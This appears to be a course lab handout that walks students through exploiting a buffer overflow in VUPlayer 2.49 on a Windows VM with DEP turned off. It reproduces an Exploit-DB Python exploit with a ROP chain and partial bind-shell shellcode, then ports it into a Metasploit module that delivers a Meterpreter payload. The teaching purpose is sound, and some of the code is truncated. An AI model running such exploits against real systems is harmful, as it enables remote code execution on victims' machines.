H 312: Writing a Custom Metasploit Module (25 pts)

What you need


To practice creating a Metasploit module in Ruby. There are many considerations to making an excellent module, as explained here, but in this project we'll only be making a very simple one with the minimal features to work.

Task 1: Preparing the Windows Target

Turning Off DEP

On your Windows machine, click Start and type "Control Panel".

In Control Panel, click "System and Security". Click System.

In the System box, click "Advanced System Settings".

In System Properties, on the Advanced tab, in the Performance section, click the Settings button.

In the Performance Options box, on the "Data Execution Prevention" tab, click "Turn on DEP for essential Windows programs and services only", as shown below.

Click OK. Click OK again. Click OK again.

Restart your server.

Installing the Vulnerable Software

On your Windows machine, download this file:


Install the software with the default options.

Task 2: Using a Proof-of-Concept Exploit

On your Debian server, create a file and paste in the code below, which came straight from Exploit-DB

# Exploit title: VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP,ASLR)
# Date: 2020-05-22
# Exploit Author: Gobinathan L
# Vendor Homepage: http://www.vuplayer.com/
# Version: v2.49
# Tested on: Windows 7 Professional with ALSR and Full DEP Turned ON.

# Usage             : $ python <exploit>.py 

#===================================[ VUPlayer 2.49 Exploit Generator ]======================================#

import struct

# msfvenom -p windows/shell_bind_tcp exitfunc=thread -b "\x00\x0a\x0d\x1a" -f c
shell = ("\xd9\xc9\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1\x53\xbd\xa9\xc1\xbf"

ret     = struct.pack("<I", 0x10010158)

def create_rop_chain():

    rop_gadgets = [
      0x100106e1,    #POP EBP RET
      0x100106e1,    #Ptr to POP EBP RET popped into EBP
      0x10015f82,    #POP EAX RET
      0xfffffdff,    #Value to Negate.. result in 0x201
      0x10014db4,    #NEG EAX RET
      0x10032f72,    #XCHG EAX, EBX RET
      0x10015f82,    #POP EAX RET
      0xffffffc0,    #Value to negate ..result in 0x40
      0x10014db4,    #NEG EAX RET
      0x10038a6d,    #XCHG EAX, EDX RET
      0x106053e5,    #POP ECX RET      
      0x101082cc,    #Random Location with Write Access
      0x1001621c,    #POP EDI RET
      0x10010158,    #RET will be stored in EDI
      0x10604154,    #POP ESI RET
      0x10101c02,    #JMP [EAX]
      0x10015f77,    # POP EAX # RETN [BASS.dll] 
      0x10109270,    # ptr to &VirtualProtect() [IAT BASSWMA.dll]
      0x1001d7a5,    # PUSHAD # RETN
      0x10022aa7,    # JMP ESP
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()
shellcode = "\x90"*32 + shell

buffer = "A"*1012
buffer+= ret
buffer+= rop_chain
buffer+= shellcode
buffer+= "\x90"*(2500 - len(buffer))

    f = open("exploit.m3u", "w")
    print("[+] Payload Generated Successfully.")
    print("[+] Check for Open Port [4444] on Target Machine. A Bind shell is waiting for you..")
    print("[-] Couldn't Generate Payload.")
Run the exploit to create a malicious file named exploit.m3u

Move that file to your Windows system.

On your Windows system, click Start, VUPlayer.

In VUPlayer, click File, "Open Playlist".

Navigate to the exploit.m3u file and double-click it.

H 312.1: Binary Name (10 pts)

Open a Command Prompt and execute this command:
netstat -ban | more
Find the name of the binary listening on port 4444, which is covered by a green box in the image below. That's the flag.

Task 3: Writing a Metasploit Module

This is a template showing the structure of a Metasploit module. It's written in Ruby.
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

    include Msf::Exploit::FILEFORMAT

  def initialize(info={})
      'Name'           => "[Vendor] [Software] [Root Cause] [Vulnerability type]",
      'Description'    => %q{
        Say something that the user might need to know
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Name' ],
      'References'     =>
          [ 'URL', '' ]
      'DefaultOptions' =>
          'EXITFUNC' => 'process',
      'Platform'       => 'win',
      'Targets'        =>
          [ 'System or software version',
              'Ret' => 0x41414141 # This will be available in `target.ret`
      'Payload'        =>
          'BadChars' => "\x00"
      'Privileged'     => false,
      'DisclosureDate' => "Apr 1 2013",
      'DefaultTarget'  => 0))

  def check
    # For the check command

  def exploit
    # Main function


Building your Module

On your Debian server, execute these commands:
sudo mkdir -p /root/.msf4/modules/exploits/windows/misc
sudo nano  /root/.msf4/modules/exploits/windows/misc/vuplayer_bof.rb
Paste in the template code above.

Make these modifications:

Testing the Format

So far this module has only metadata, but no actual exploit code.

Before adding exploit code, do this to test the format of your module.

On your Debian server, execute this command:

sudo msfconsole -q
If there are errors in your module, you'll see an error message, as shown below.

Examine the log file referenced in the errormessage for help finding and correcting your errors until your module loads without errors.

Adding the ROP Chain

The original Python exploit builds a ROP chain with the function "create_rop_chain()".

Look at this Metasploit module for an example of how to implement a ROP chain:


Add a "create_rop_chain()" function to your module, including the ROP chain from the original Python exploit. At the end of your function, use this code instead of Python's "struct.pack" function:

    return rop_gadgets
Test your module's format again with msfconsole.

Adding the Exploit Function

Look at this Metasploit module for an example of an "exploit" function that creates a malicious file:

Easy RM to MP3 Converter ( Stack Buffer Overflow

Add an "exploit" function to your module, building the file the same way as the original Python exploit.

Note these details:

Test your module's format again with msfconsole.

Meterpreter Exploit

On your Debian server, execute these commands:
sudo msfconsole -q
search vup
Find your module in the list and use it, as shown below.

To create a Meterpreter bind exploit file, execute these commands:

set payload windows/meterpreter/bind_tcp
The malicious file is created, as shown below.

H 312.2: Session Name (15 pts)

On your Windows target, open the malicious file in VUPlayer.

Then, in a Command Prompt, execute this command:

tasklist /FI "ImageName eq VUPlayer.exe" /V
Find the session name, which is covered by a green box in the image below. That's the flag.


How to get started with writing an exploit
Easy RM to MP3 Converter ( Stack Buffer Overflow

Posted 5-21-2020